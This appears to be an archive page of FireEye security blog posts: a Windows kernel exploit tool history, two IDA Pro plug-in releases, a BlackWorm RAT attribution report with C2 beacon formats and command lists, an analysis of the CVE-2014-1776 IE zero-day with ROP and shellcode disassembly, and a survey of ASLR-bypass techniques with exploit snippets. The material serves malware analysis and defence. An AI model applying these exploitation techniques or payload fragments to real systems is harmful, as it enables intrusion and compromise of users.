64-bit Windows 8 and later users are not affected by this exploit. Supervisor Mode Execution Prevention (SMEP) blocks the attacker’s user-mode callback from executing within kernel-mode and causes the exploits to fail.


Exploits Tool History


The exploits are implemented as a command line tool that accepts a single command line argument – a shell command to execute with SYSTEM privileges. This tool appears to be an updated version of an earlier tool. The earlier tool exploited CVE-2011-1249, and displays the following usage message to stdout when run:


Usage:system_exp.exe cmd



Windows Kernel Local Privilege Exploits


The vast majority of samples of the earlier tool have compile dates in December 2009.  Only two samples were discovered with compile dates in March 2011. Although the two samples exploit the same CVE, they carry a slightly modified usage message of:


Usage:local.exe cmd



Windows local Exploits


The most recent version of the tool, which implements CVE-2014-4113, eliminates all usage messages.

The tool appears to have gone through at least three iterations over time. The initial tool and exploits is believed to have had limited availability, and may have been employed by a handful of distinct attack groups. As the exploited vulnerability was remediated, someone with access to the tool modified it to use a newer exploit when one became available. These two newer versions likely did not achieve the widespread distribution that the original tool/exploits did and may have been retained privately, not necessarily even by the same actors.

We would like to thank Barry Vengerik, Joshua Homan, Steve Davis, Ned Moran, Corbin Souffrant, Xiaobo Chen for their assistance on this research.

FLARE IDA Pro Script Series: MSDN Annotations IDA Pro for Malware Analysis

The FireEye Labs Advanced Reverse Engineering (FLARE) Team continues to share knowledge and tools with the community. We started this blog series with a script for Automatic Recovery of Constructed Strings in Malware. As always, you can download these scripts at the following location: We hope you find all these scripts as useful as we do.




During my summer internship with the FLARE team, my goal was to develop IDAPython plug-ins that speed up the reverse engineering workflow in IDA Pro. While analyzing malware samples with the team, I realized that a lot of time is spent looking up information about functions, arguments, and constants at the Microsoft Developer Network (MSDN) website. Frequently switching to the developer documentation can interrupt the reverse engineering process, so we thought about ways to integrate MSDN information into IDA Pro automatically. In this blog post we will release a script that does just that, and we will show you how to use it.




The MSDN Annotations plug-in integrates information about functions, arguments and return values into IDA Pro’s disassembly listing in the form of IDA comments. This allows the information to be integrated as seamlessly as possible. Additionally, the plug-in is able to automatically rename constants, which further speeds up the analyst workflow. The plug-in relies on an offline XML database file, which is generated from Microsoft’s documentation and IDA type library files.




Table 1 shows what benefit the plug-in provides to an analyst. On the left you can see IDA Pro’s standard disassembly: seven arguments get pushed onto the stack and then the CreateFileA function is called. Normally an analyst would have to look up function, argument and possibly constant descriptions in the documentation to understand what this code snippet is trying to accomplish. To obtain readable constant values, an analyst would be required to research the respective argument, import the corresponding standard enumeration into IDA and then manually rename each value. The right side of Table 1 shows the result of executing our plug-in showing the support it offers to an analyst.

The most obvious change is that constants are renamed automatically. In this example, 40000000h was automatically converted to GENERIC_WRITE. Additionally, each function argument is renamed to a unique name, so the corresponding description can be added to the disassembly.


Table 1: Automatic labelling of standard symbolic constants

In Figure 1 you can see how the plug-in enables you to display function, argument, and constant information right within the disassembly. The top image shows how hovering over the CreateFileA function displays a short description and the return value. In the middle image, hovering over the hTemplateFile argument displays the corresponding description. And in the bottom image, you can see how hovering over dwShareMode, the automatically renamed constant displays descriptive information.







Figure 1: Hovering function names, arguments and constants displays the respective descriptions


How it works


Before the plug-in makes any changes to the disassembly, it creates a backup of the current IDA database file (IDB). This file gets stored in the same directory as the current database and can be used to revert to the previous markup in case you do not like the changes or something goes wrong.

The plug-in is designed to run once on a sample before you start your analysis. It relies on an offline database generated from the MSDN documentation and IDA Pro type library (TIL) files. For every function reference in the import table, the plug-in annotates the function’s description and return value, adds argument descriptions, and renames constants. An example of an annotated import table is depicted in Figure 2. It shows how a descriptive comment is added to each API function call. In order to identify addresses of instructions that position arguments prior to a function call, the plug-in relies on IDA Pro’s markup.


Figure 2: Annotated import table

Figure 3 shows the additional .msdn segment the plug-in creates in order to store argument descriptions. This only impacts the IDA database file and does not modify the original binary.


Figure 3: The additional segment added to the IDA database

The .msdn segment stores the argument descriptions as shown in Figure 4. The unique argument names and their descriptive comments are sequentially added to the segment.


Figure 4: Names and comments inserted for argument descriptions

To allow the user to see constant descriptions by hovering over constants in the disassembly, the plug-in imports IDA Pro’s relevant standard enumeration and adds descriptive comments to the enumeration members. Figure 5 shows this for the MACRO_CREATE enumeration, which stores constants passed as dwCreationDisposition to CreateFileA.


Figure 5: Descriptions added to the constant enumeration members


Preparing the MSDN database file


The plug-in’s graphical interface requires you to have the QT framework and Python scripting installed. This is included with the IDA Pro 6.6 release. You can also set it up for IDA 6.5 as described here (

As mentioned earlier, the plug-in requires an XML database file storing the MSDN documentation. We cannot distribute the database file with the plug-in because Microsoft holds the copyright for it. However, we provide a script to generate the database file. It can be cloned from the git repository at together with the annotation plug-in.

You can take the following steps to setup the database file. You only have to do this once.



  1. Download and install an offline version of the MSDN documentationYou can download the Microsoft Windows SDK MSDN documentation. The standalone installer can be downloaded from Although it is not the newest SDK version, it includes all the needed information and data extraction is straight-forward.As shown in Figure 6, you can select to only install the help files. By default they are located in C:\Program Files\Microsoft SDKs\Windows\v7.0\Help\1033.



    Figure 6: Installing a local copy of the MSDN documentation


  2. Extract the files with an archive manager like 7-zip to a directory of your choice.
  3. Download and extract tilib.exe from Hex-Ray’s download page at 


    To allow the plug-in to rename constants, it needs to know which enumerations to import. IDA Pro stores this information in TIL files located in %IDADIR%/til/. Hex-Rays provides a tool (tilib) to show TIL file contents via their download page for registered users. Download the tilib archive and extract the binary into %IDADIR%. If you run tilib without any arguments and it displays its help message, the program is running correctly.

  4. Run MSDN_crawler/ <path to extracted MSDN documentation> <path to tilib.exe> <path to til files>



    With these prerequisites fulfilled, you can run the script, located in the MSDN_crawler directory. It expects the path to the TIL files you want to extract (normally %IDADIR%/til/pc/) and the path to the extracted MSDN documentation. After the script finishes execution the final XML database file should be located in the MSDN_data directory.



You can now run our plug-in to annotate your disassembly in IDA.

Running the MSDN annotations plug-in

In IDA, use File - Script file... (ALT + F7) to open the script named This will display the dialog box shown in Figure 7 that allows you to configure the modifications the plug-in performs. By default, the plug-in annotates functions, arguments and rename constants. If you change the settings and execute the plug-in by clicking OK, your settings get stored in a configuration file in the plug-in’s directory. This allows you to quickly run the plug-in on other samples using your preferred settings. If you do not choose to annotate functions and/or arguments, you will not be able to see the respective descriptions by hovering over the element.


Figure 7: The plug-in’s configuration window showing the default settings

When you choose to use repeatable comments for function name annotations, the description is visible in the disassembly listing, as shown in Figure 8.


Figure 8: The plug-in’s preview of function annotations with repeatable comments


Similar Tools and Known Limitations


Parts of our solution were inspired by existing IDA Pro plug-ins, such as IDAScope and IDAAPIHelp. A special thank you goes out to Zynamics for their MSDN crawler and the IDA importer which greatly supported our development.

Our plug-in has mainly been tested on IDA Pro for Windows, though it should work on all platforms. Due to the structure of the MSDN documentation and limitations of the MSDN crawler, not all constants can be parsed automatically. When you encounter missing information you can extend the annotation database by placing files with supplemental information into the MSDN_data directory. In order to be processed correctly, they have to be valid XML following the schema given in the main database file (msdn_data.xml). However, if you want to extend partly existing function information, you only have to add the additional fields. Name tags are mandatory for this, as they get used to identify the respective element.

For example, if the parser did not recognize a commonly used constant, we could add the information manually. For the CreateFileA function’s dwDesiredAccess argument the additional information could look similar to Listing 1.

















<?xml version="1.0" encoding="ISO-8859-1"?>








<constants enums="MACRO_GENERIC">




<description>All possible access rights</description>





<description>Execute access</description>





<description>Write access</description>





<description>Read access</description>










Listing 1: Additional information enhancing the dwDesiredAccess argument for the CreateFileA function




In this post, we showed how you can generate a MSDN database file used by our plug-in to automatically annotate information about functions, arguments and constants into IDA Pro’s disassembly. Furthermore, we talked about how the plug-in works, and how you can configure and customize it. We hope this speeds up your analysis process!

Stay tuned for the FLARE Team’s next post where we will release solutions for the FLARE On Challenge (


Connecting the Dots: Syrian Malware Team Uses BlackWorm for Attacks

The Syrian Electronic Army has made news for its recent attacks on major communications websites, Forbes, and an alleged attack on CENTCOM. While these attacks garnered public attention, the activities of another group - The Syrian Malware Team - have gone largely unnoticed. The group’s activities prompted us to take a closer look. We discovered this group using a .NET based RAT called BlackWorm to infiltrate their targets.

The Syrian Malware Team is largely pro-Syrian government, as seen in one of their banners featuring Syrian President Bashar al-Assad. Based on the sentiments publicly expressed by this group it is likely that they are either directly or indirectly involved with the Syrian government. Further certain members of the Syrian Malware Team have ties to the Syrian Electronic army (SEA) known to be linked to the Syrian government. This indicates that the Syrian Malware Team may also be possibly an offshoot or part of the SEA.


Banner used by the Syrian Malware Team

BlackWorm Authorship

We found at least two distinct versions of the BlackWorm tool, including an original/private version (v0.3.0) and the Dark Edition (v2.1). The original BlackWorm builder was co-authored by Naser Al Mutairi from Kuwait, better known by his online moniker 'njq8'. He is also known to have coded njw0rm, njRAT/LV, and earlier versions of H-worm/Houdini. We found his code being used in a slew of other RATs such as Fallaga and Spygate. BlackWorm v0.3.0 was also co-authored by another actor, Black Mafia.


About section within the original version of BlackWorm builder

Within the underground development forums, it’s common for threat actors to collaborate on toolsets. Some write the base tools that other attackers can use; others modify and enhance existing tools.

The BlackWorm builder v2.1 is a prime example of actors modifying and enhancing current RATs. After njq8 and Black Mafia created the original builder, another author, Black.Hacker, enhanced its feature set.


About section within BlackWorm Dark Edition builder


Black.Hacker's banner on social media


As an interesting side note, 'njq8' took down his blog in recent months and announced a cease in all malware development activity on his Twitter and Facebook account, urging others to stop as well. This is likely a direct result of the lawsuit filed against him by Microsoft.

BlackWorm RAT Features

The builder for BlackWorm v0.3.0 is fairly simple and allows for very quick payload, but doesn’t allow any configuration other than the IP address for command and control (C2).


Building binary through BlackWorm v0.3.0


BlackWorm v0.3.0 controller

BlackWorm v0.3.0 supports the following commands between the controller and the implant:

ping Checks if victim is online
closeserver Exits the implant
restartserver Restarts the implant
sendfile Transfer and run file from server
download Download and run file from URL
ddos Ping flood target
msgbox Message interaction with victim
down Kill critical windows processes
blocker Block specified website by pointing resolution to
logoff Logout out of windows
restart Restart system
shutdown Shutdown system
more Disable task manager, registry tools, system restore. Also blocks keyboard and mouse input
hror Displays a startling flash video

In addition to the features supported by the command structure, the payload can:

  • Seek and kill no-ip processes DUC30 and DUC20
  • Disable Task Manager to kill process dialog
  • Copy itself to USB drives and create autorun entries
  • Copy itself to common peer-to-peer (P2P) share locations
  • Collect system information such as OS, username, hostname, presence of camera, active window name, etc., to display in the controller
  • Kill the following analysis processes (if found):
    • procexp
    • SbieCtrl
    • SpyTheSpy
    • SpeedGear
    • Wireshark
    • MBAM
    • ApateDNS
    • IPBlocker
    • cPorts
    • ProcessHacker
    • AntiLogger

The Syrian Malware Team primarily uses another version of BlackWorm called the Dark Edition (v2.1). BlackWorm v2.1 was released on a prolific underground forum where information and code is often shared, traded and sold.


BlackWorm v2.1 has the same abilities as the original version and additional functionality, including bypassing UAC, disabling host firewalls and spreading over network shares. Unlike its predecessor, it also allows for granular control of the features available within the RAT. These additional controls allow the RAT user to enable and disable features as needed. Binary output can be also be generated in multiple formats, such as .exe, .src and .dll.


BlackWorm Dark Edition builder

Syrian Malware Team

We observed activity from the Syrian Malware Team going as far back as Jan. 1, 2011. Based on Facebook posts, they are allegedly directly or indirectly involved with the Syrian government. Their Facebook page shows they are still very active, with a post as recent as July 16th, 2014.


Syrian Malware Team’s Facebook page

The Syrian Malware Team has been involved in everything from profiling targets to orchestrating attacks themselves. There are seemingly multiple members, including:

Partial list of self-proclaimed Syrian Malware Team members

Some of these people have posted malware-related items on Facebook.


Facebook posting of virus scanning of files

While looking for Dark Edition samples, we discovered a binary named svchost.exe (MD5: 015c51e11e314ff99b1487d92a1ba09b). We quickly saw indicators that it was created by BlackWorm Dark Edition.


Configuration options within code

The malware communicated out to, over port 5050, with a command structure of:

!0/j|n\12121212_64F3BF1F/j|n\{Hostname}/j|n\{Username}/j|n\USA/j|n\Win 7 Professional SP1 x86/j|n\No/j|n\2.4.0 [ Dark Edition]/j|n\/j|n\{ActiveWindowName}/j|n\[endof]

When looking at samples of Dark Edition BlackWorm being used by the Syrian Malware Team, the strings “Syrian Malware,” or “Syrian Malware Team” are often used in the C2 communications or within the binary strings.

Additional pivoting off of svchost.exe brought us to three additional samples apparently built with BlackWorm Dark Edition. E.exe, (MD5: a8cf815c3800202d448d035300985dc7) a binary that drew our attention, looked to be a backdoor with the Syrian Malware strings within it.


When executed, the binary beacons to on port 1177. This C2 has been seen in multiple malware runs often associated with Syria.  The command structure of the binary is:

!0/j|n\Syrian Malware/j|n\{Hostname}/j|n\{Username}/j|n\USA/j|n\Win 7 Professional SP1 x86/j|n\No/j|n


Finally, pivoting to another sample, 1gpj.srcRania (MD5:f99c15c62a5d981ffac5fdb611e13095), the same strings were present. The string "Rania" used as a lure was in Arabic and likely refers to the prolific Queen Rania of Jordan.


The traffic is nearly identical to the other samples we identified and tied to the Syrian Malware Team.

!1/j|n\C:\Documents and Settings\{Username}\Local Settings\Application DataldoDrZdpkK.jpg - Windows Internet Explorer[endof]!0/j|n\Syrian Malware/j|n\{Hostname}/j|n\{Username}/j|n\USA/j|n\Win XP ProfessionalSP2 x86/j|n\No/j|n\0.1/j|n\/j|n\C:\Documents and Settings\{Username}\Local Settings\Application DataldoDrZdpkK.jpg - {ActiveWindowName}/j|n\[endof]


Determining which groups use which malware is often very difficult. Connecting the dots between actors and malware typically involves looking at binary code, identifying related malware examples associated with those binaries, and reviewing infection vectors, among other things.

This blog presents a prime example of the process of attribution. We connected a builder with malware samples and the actors/developers behind these attacks. This type of attribution is key to creating actionable threat intelligence to help proactively protect organizations.

FLARE IDA Pro Script Series: Automatic Recovery of Constructed Strings in Malware

The FireEye Labs Advanced Reverse Engineering (FLARE) Team is dedicated to sharing knowledge and tools with the community. We started with the release of the FLARE On Challenge in early July where thousands of reverse engineers and security enthusiasts participated. Stay tuned for a write-up of the challenge solutions in an upcoming blog post.

This post is the start of a series where we look to aid other malware analysts in the field. Since IDA Pro is the most popular tool used by malware analysts, we’ll focus on releasing scripts and plug-ins to help make it an even more effective tool for fighting evil. In the past, at Mandiant we released scripts on GitHub and we’ll continue to do so at the following new location This is where you will also find the plug-ins we released in the past: Shellcode Hashes and Struct Typer. We hope you find all these scripts as useful as we do.

Quick Challenge

Let’s start with a simple challenge. What two strings are printed when executing the disassembly shown in Figure 1?


Figure 1: Disassembly challenge

If you answered “Hello world\n” and “Hello there\n”, good job! If you didn’t see it then Figure 2 makes this more obvious. The bytes that make up the strings have been converted to characters and the local variables are converted to arrays to show buffer offsets.

Figure 2: Disassembly challenge with markup

Reverse engineers are likely more accustomed to strings that are a consecutive sequence of human-readable characters in the file, as shown in Figure 3. IDA generally does a good job of cross-referencing these strings in code as can be seen in Figure 4.

Figure 3: A simple string

Figure 4: Using a simple string

Manually constructed strings like in Figure 1 are often seen in malware. The bytes that make up the strings are stored within the actual instructions rather than a traditional consecutive sequence of bytes. Simple static analysis with tools such as strings cannot detect these strings. The code in Figure 5, used to create the challenge disassembly, shows how easy it is for a malware author to use this technique.

Figure 5: Challenge source code

Automating the recovery of these strings during malware analysis is simple if the compiler follows a basic pattern. A quick examination of the disassembly in Figure 1 could lead you to write a script that searches for mov instructions that begin with the opcodes C6 45 and then extract the stack offset and character bytes. Modern compilers with optimizations enabled often complicate matters as they may:

  • Load frequently used characters in registers which are used to copy bytes into the buffer
  • Reuse a buffer for multiple strings
  • Construct the string out of order

Figure 6 shows the disassembly of the same source code that was compiled with optimizations enabled. This caused the compiler to load some of the frequently occurring characters in registers to reduce the size of the resulting assembly. Extra instructions are required to load the registers with a value like the 2-byte mov instruction at 0040115A, but using these registers requires only a 4-byte mov instruction like at 0040117D. The mov instructions that contain hard-coded byte values are 5-bytes, such as at 0040118F.

Figure 6: Compiler optimizations

The StackStrings IDA Pro Plug-in

To help you defeat malware that contains these manually constructed strings we’re releasing an IDA Pro plug-in named StackStrings that is available at The plug-in relies heavily on analysis by a Python library called Vivisect. Vivisect is a binary analysis framework frequently used to augment our analysis. StackStrings uses Vivisect’s analysis and emulation capabilities to track simple memory usage by the malware. The plug-in identifies memory writes to consecutive memory addresses of likely string data and then prints the strings and locations, and creates comments where the string is constructed. Figure 7 shows the result of running the above program with the plug-in.

Figure 7: StackStrings plug-in results

While the plug-in is called StackStrings, its analysis is not just limited to the stack. It also tracks all memory segments accessed during Vivisect’s analysis, so manually constructed strings in global data are identified as well as shown in Figure 8.

Figure 8: Sample global string

Simple, manually constructed WCHAR strings are also identified by the plug-in as shown in Figure 9.

Figure 9: Sample WCHAR data


Download Vivisect from and add the package to your PYTHONPATH environment variable if you don’t already have it installed.

Clone the git repository at The python\ file is the IDA Python script that contains the plug-in logic. This can either be copied to your %IDADIR%\python directory, or it can be in any directory found in your PYTHONPATH. The plugins\ file must be copied to the %IDADIR%\plugins directory.

Test the installation by running the following Python commands within IDA Pro and ensure no error messages are produced:

Screen Shot 2014-08-01 at 1.06.24 PM

To run the plugin in IDA Pro go to Edit – Plugins – StackStrings or press Alt+0.

Known Limitations

The compiler may aggressively optimize memory and register usage when constructing strings. The worst-case scenario for recovering these strings occurs when a memory buffer is reused multiple times within a function, and if string construction spans multiple basic blocks. Figure 10 shows the construction of “Hello world\n” and “Hello there\n”. The plug-in attempts to deal with this by prompting the user by asking whether you want to use the basic-block aggregator or function aggregator.  Often the basic-block level of memory aggregation is fine, but in this situation running the plug-in both ways provides additional results.

Figure 10: Two strings, one buffer, multiple basic blocks

You’ll likely get some false positives due to how Vivisect initializes some data for its emulation. False positives should be obvious when reviewing results, as seen in Figure 11.

Figure 11: False positive due to memory initialization

The plug-in aggressively checks for strings during aggregation steps, so you’ll likely get some false positives if the compiler sets null bytes in a stack buffer before the complete string is constructed.

The plug-in currently loads a separate Vivisect workspace for the same executable loaded in IDA. If you’ve manually loaded additional memory segments within your IDB file, Vivisect won’t be aware of that and won’t process those.

Vivisect’s analysis does not always exactly match that of IDA Pro, and differences in the way the stack pointer is tracked between the two programs may affect the reconstruction of stack strings.

If the malware is storing a binary string that is later decoded, even with a simple XOR mask, this plug-in likely won’t work.

The plug-in was originally written to analyze 32-bit x86 samples. It has worked on test 64-bit samples, but it hasn’t been extensively tested for that architecture.


StackStrings is just one of many internally developed tools we use on the FLARE team to speed up our analysis. We hope it will help speed up your analysis too. Stay tuned for our next post where we’ll release another tool to improve your malware analysis workflow.

New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks


FireEye Research Labs identified a new Internet Explorer (IE) zero-day exploit used in targeted attacks.  The vulnerability affects IE6 through IE11, but the attack is targeting IE9 through IE11.  This zero-day bypasses both ASLR and DEP. Microsoft has assigned CVE-2014-1776 to the vulnerability and released security advisory to track this issue.

Threat actors are actively using this exploit in an ongoing campaign which we have named "Operation Clandestine Fox." However, for many reasons, we will not provide campaign details. But we believe this is a significant zero day as the vulnerable versions represent about a quarter of the total browser market. We recommend applying a patch once available.

According to NetMarket Share, the market share for the targeted versions of IE in 2013 were:

IE 9      13.9%

IE 10    11.04%

IE 11     1.32%

Collectively, in 2013, the vulnerable versions of IE accounted for 26.25% of the browser market.  The vulnerability, however, does appear in IE6 through IE11 though the exploit targets IE9 and higher.


The Details


The exploit leverages a previously unknown use-after-free vulnerability, and uses a well-known Flash exploitation technique to achieve arbitrary memory access and bypass Windows’ ASLR and DEP protections.





• Preparing the heap


The exploit page loads a Flash SWF file to manipulate the heap layout with the common technique heap feng shui. It allocates Flash vector objects to spray memory and cover address 0x18184000. Next, it allocates a vector object that contains a flash.Media.Sound() object, which it later corrupts to pivot control to its ROP chain.


• Arbitrary memory access


The SWF file calls back to Javascript in IE to trigger the IE bug and overwrite the length field of a Flash vector object in the heapspray. The SWF file loops through the heapspray to find the corrupted vector object, and uses it to again modify the length of another vector object. This other corrupted vector object is then used for subsequent memory accesses, which it then uses to bypass ASLR and DEP.


• Runtime ROP generation


With full memory control, the exploit will search for ZwProtectVirtualMemory, and a stack pivot (opcode 0x94 0xc3) from NTDLL. It also searches for SetThreadContext in kernel32, which is used to clear the debug registers. This technique, may be an attempt to bypass protections that use hardware breakpoints, such as EMET’s EAF mitigation.

With the addresses of the aforementioned APIs and gadget, the SWF file constructs a ROP chain, and prepends it to its RC4 decrypted shellcode. It then replaces the vftable of a sound object with a fake one that points to the newly created ROP payload. When the sound object attempts to call into its vftable, it instead pivots control to the attacker’s ROP chain.


• ROP and Shellcode


The ROP payload basically tries to make memory at 0x18184000 executable, and to return to 0x1818411c to execute the shellcode.


0:008> dds eax


18184100 770b5f58 ntdll!ZwProtectVirtualMemory

18184104 1818411c

18184108 ffffffff

1818410c 181840e8

18184110 181840ec

18184114 00000040

18184118 181840e4


Inside the shellcode, it saves the current stack pointer to 0x18181800 to safely return to the caller.


mov     dword ptr ds:[18181800h],ebp


Then, it restores the flash.Media.Sound vftable and repairs the corrupted vector object to avoid application crashes.


18184123 b820609f06      mov     eax,69F6020h


18184128 90 nop

18184129 90 nop

1818412a c700c0f22169 mov dword ptr [eax],offset Flash32_11_7_700_261!AdobeCPGetAPI+0x42ac00 (6921f2c0)

18184133 b800401818 mov eax,18184000h

18184138 90 nop

18184139 90 nop

1818413a c700fe030000 mov dword ptr [eax],3FEh ds:0023:18184000=3ffffff0


The shellcode also recovers the ESP register to make sure the stack range is in the current thread stack base/limit.


18184140 8be5            mov     esp,ebp


18184142 83ec2c sub esp,2Ch

18184145 90 nop

18184146 eb2c jmp 18184174


The shellcode calls SetThreadContext to clear the debug registers. It is possible that this is an attempt to bypass mitigations that use the debug registers.


18184174 57              push    edi


18184175 81ece0050000 sub esp,5E0h

1818417b c7042410000100 mov dword ptr [esp],10010h

18184182 8d7c2404 lea edi,[esp+4]

18184186 b9dc050000 mov ecx,5DCh

1818418b 33c0 xor eax,eax

1818418d f3aa rep stos byte ptr es:[edi]

1818418f 54 push esp

18184190 6afe push 0FFFFFFFEh

18184192 b8b308b476 mov eax,offset kernel32!SetThreadContext (76b408b3)

18184197 ffd0 call eax


The shellcode calls URLDownloadToCacheFileA to download the next stage of the payload, disguised as an image.




Using EMET may break the exploit in your environment and prevent it from successfully controlling your computer. EMET versions 4.1 and 5.0 break (and/or detect) the exploit in our tests.

Enhanced Protected Mode in IE breaks the exploit in our tests. EPM was introduced in IE10.

Additionally, the attack will not work without Adobe Flash. Disabling the Flash plugin within IE will prevent the exploit from functioning.


Threat Group History


The APT group responsible for this exploit has been the first group to have access to a select number of browser-based 0-day exploits (e.g. IE, Firefox, and Flash) in the past. They are extremely proficient at lateral movement and are difficult to track, as they typically do not reuse command and control infrastructure. They have a number of backdoors including one known as Pirpi that we previously discussed here. CVE-2010-3962, then a 0-day exploit in Internet Explorer 6, 7, and 8 dropped the Pirpi payload discussed in this previous case.

As this is still an active investigation we are not releasing further indicators about the exploit at this time.

Acknowledgement: We thank Christopher Glyer, Matt Fowler, Josh Homan, Ned Moran, Nart Villeneuve and Yichong Lin for their support, research, and analysis on these findings.

ASLR Bypass Apocalypse in Recent Zero-Day Exploits

ASLR (Address Space Layout Randomization) is one of the most effective protection mechanisms in modern operation systems. But it’s not perfect. Many recent APT attacks have used innovative techniques to bypass ASLR.

Here are just a few interesting bypass techniques that we have tracked in the past year:

  • Using non-ASLR modules
  • Modifying the BSTR length/null terminator
  • Modifying the Array object

The following sections explain each of these techniques in detail.

Non-ASLR modules

Loading a non-ASLR module is the easiest and most popular way to defeat ASLR protection. Two popular non-ASLR modules are used in IE zero-day exploits: MSVCR71.DLL and HXDS.DLL.

MSVCR71.DLL, JRE 1.6.x is shipped an old version of the Microsoft Visual C Runtime Library that was not compiled with the /DYNAMICBASE option. By default, this DLL is loaded into the IE process at a fixed location in the following OS and IE combinations:

  • Windows 7 and Internet Explorer 8
  • Windows 7 and Internet Explorer 9

HXDS.DLL, shipped from MS Office 2010/2007, is not compiled with ASLR. This technique is now the most frequently used ASLR bypass for IE 8/9 on Windows 7. This DLL is loaded when the browser loads a page with ‘ms-help://’ in the URL.

The following zero-day exploits used at least one of these techniques to bypass ASLR: CVE-2013-3893, CVE2013-1347, CVE-2012-4969, CVE-2012-4792.


The non-ASLR module technique requires IE 8 and IE 9 to run with old software such as JRE 1.6 or Office 2007/2010. Upgrading to the latest versions of Java/Office can prevent this type of attack.

Modify the BSTR length/null terminator

This technique first appears in the 2010 Pwn2Own IE 8 exploit by Peter Vreugdenhil. It applies only to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing or decreasing the content of a memory pointer.

The arbitrary memory write does not directly control EIP. Most of the time, the exploit overwrites important program data such as function pointers to execute code. For attackers, the good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR so that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it can then use the same memory corruption bug to control EIP.

Few vulnerabilities can be used to modify the BSTR length. For example, some vulnerabilities can only increase/decrease memory pointers by one or two bytes. In this case, the attacker can modify the null terminator of a BSTR to concatenate the string with the next object. Subsequent accesses to the modified BSTR have the concatenated object’s content as part of BSTR, where attackers can usually find information related to DLL base addresses.


The Adobe XFA zero-day exploit uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. With this vulnerability, the exploit can decrease a controllable memory pointer before calling the function pointer from its vftable:


Consider the following memory layout before the DEC operation:

[string][null][non-null data][object]

After the DEC operation (in my tests, it is decreased twice) the memory becomes:

[string][\xfe][non-null data][object]

For further details, refer to the technique write-up from the immunityinc’s blog.


This technique usually requires multiple writes to leak the necessary info, and the exploit writer has to carefully craft the heap layout to ensure that the length field is corrupted instead of other objects in memory. Since IE 9, Microsoft has used Nozzle to prevent heap spraying/fengshui, so sometimes the attacker must use the VBArray technique to craft the heap layout.

Modify the Array object

The array object length modification is similar to the BSTR length modification: they both require a certain class of “user-friendly” vulnerabilities. Even batter, from the attacker’s view, is that once the length changes, the attacker can also arbitrarily read from or write to memory — or basically take control of the whole process flow and achieve code execution.

Here is the list of known zero-day exploits using this technique:


This exploit involves Adobe Flash player regex handling buffer overflow. The attacker overwrites the length of a Vector.<Number> object, and then reads more memory content to get base address of flash.ocx.

Here’s how the exploit works:

  1. Set up a continuous memory layout by allocating the following objects":13
  2. Free the <Number> object at index 1 of the above objects as follows:

    obj[1] = null;
  3. Allocate the new RegExp object. This allocation reuses memory in the obj[1] position as follows:

    boom = "(?i)()()(?-i)||||||||||||||||||||||||";
    var trigger = new RegExp(boom, "");

Later, the malformed expression overwrites the length of a Vector.<Number> object in obj[2] to enlarge it. With a corrupted size, the attacker can use obj[2] to read from or write to memory in a huge region to locate the flash.ocx base address and overwrite a vftable to execute the payload.


This vulnerability involves a IE CBlockContainerBlock object use-after-free error. This exploit is similar to CVE-2013-0634, but more sophisticated.

Basically, this vulnerability modifies the arbitrary memory content using an OR instruction. This instruction is something like the following:

or dword ptr [esi+8],20000h

Here’s how it works:

  1. First, the attacker sprays the target heap memory with Vector.<uint> objects as follows:.12
  2. After the spray, those objects are stored aligned in a stable memory address. For example:1

    The first dword, 0x03f0, is the length of the Vector.<uint> object, and the yellow marked values correspond to the values in above spray code.

  3. If the attacker sets the esi + 8 point to 0x03f0, the size becomes 0x0203f0 after the OR operation — which is much larger than the original size.
  4. With the larger access range, the attacker can change the next object length to 0x3FFFFFF0.14
  5. From there, the attacker can access the whole memory space in the IE process. ASLR is useless because the attacker can retrieve the entire DLL images for kernel32/NTDLL directly from memory. By dynamically searching for stack pivot gadgets in the text section and locating the ZwProtectVirtualMemory native API address from the IAT, the attacker can construct a ROP chain to change the memory attribute and bypass the DEP as follows:9

By crafting the memory layout, the attacker also allocates a Vector.<object> that contains the flash.Media.Sound() object. The attacker uses the corrupted Vector.<uint> object to search the sound object in memory and overwrite it’s vftable to point to ROP payload and shellcode.


The use-after-free vulnerability in Firefox’s DocumentViewerImpl object allows the user to write a word value 0x0001 into an arbitrary memory location as follows:


In above code, all the variables that start with “m” are read from the user-controlled object. If the user can set the object to meet the condition in the second “if” statement, it forces the code path into the setImageAnimationMode() call, where the memory write is triggered. Inside the setImageAnimationMode(), the code looks like the following:


In this exploit, the attacker tries to use ArrayBuffer to craft the heap layout. In the following code, each ArrayBuffer element for var2 has the original size 0xff004.


After triggering the vulnerability, the attacker increases the size of the array to to 0x010ff004. The attacker can also locate this ArrayBuffer by comparing the byteLength in JavaScript. Then, the attacker can read to or write from memory with the corrupted ArrayBuffer. In this case, the attacker choose to disclosure the NTDLL base address from SharedUserData (0x7ffe0300), and manually hardcoded the offset to construct the ROP payload.


This vulnerability involves a JAVA CMM integer overflow that allows overwriting the array length field in memory. During exploitation, the array length actually expands to 0x7fffffff, and the attacker can search for the securityManager object in memory and null it to break the sandbox. This technique is much more effective than overwriting function pointers and dealing with ASLR/DEP to get native code execution.

The Array object modification technique is much better than other techniques. For the Flash ActionScript vector technique, there are no heap spray mitigations at all. As long as you have a memory-write vulnerability, it is easily implemented.


The following table outlines recent APT zero-day exploits and what bypass techniques they used:



ASLR bypassing has become more and more common in zero-day attacks. We have seen previous IE zero-day exploits using Microsoft Office non-ASLR DLL to bypass it, and Microsoft also did some mitigation in their latest OS and browser to prevent use of the non-ASLR module to defeat ASLR. Because the old technique will no longer work and can be easily detected, cybercriminals will have to use the advanced exploit technique. But for specific vulnerabilities that allow writing memory, combining the Vector.<uint> and Vector.<object> is more reliable and flexible. With just one shot, extending the exploit from writing a single byte to reading or writing gigabytes is easy and works for the latest OS and browser regardless of the OS, application, or language version.

Many researchers have published research on ASLR bypassing, such as Dion Blazakis’s JIT spray and Yuyang’s LdrHotPatchRoutine technique. But so far we haven’t seen any zero-day exploit leveraging them in the wild. The reason could be that these techniques are generic approaches to defeating ASLR. And they are usually fixed quickly after going public.

But there is no generic way to fix vulnerability-specific issues. In the future, expect more and more zero-day exploits using similar or more advanced techniques. We may need new mitigations in our OSs and security products to defeat them.

Thanks again to Dan Caselden and Yichong Lin for their help with this analysis.

Ready for Summer: The Sunshop Campaign

